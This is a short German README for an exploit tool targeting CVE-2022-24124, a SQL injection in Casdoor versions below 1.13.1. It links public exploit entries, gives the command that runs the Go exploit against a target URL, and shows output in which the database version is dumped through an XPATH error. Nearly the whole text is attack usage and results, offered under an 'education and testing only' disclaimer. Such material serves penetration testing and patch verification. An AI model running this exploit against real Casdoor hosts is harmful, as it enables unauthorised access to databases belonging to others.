
SQL-Datenbankversion auf einem Host dumpen, der Casdoor < 1.13.1 ausführt
Exploit-Code für CVE-2022-24124 alias Casdoor SQL Injection
Exploit-Links: [ExploitDB-50792] [PacketStormSecurity]
Erwartetes Ergebnis: SQL-Datenbankversion auf dem Host ausgeben, der Casdoor < 1.13.1 ausführt.
Nur für Bildungszwecke und Tests in Unternehmensumgebungen vorgesehen.
Barricade➜ go run exploit.go -u http://127.0.0.1:8080
-=Casdoor SQL Injection (CVE-2022-24124)=-
- by Mayank Deshmukh (ColdFusionX)
[*] Dumping Database Version
XPATH syntax error: .12-MariaDB-0+deb11u1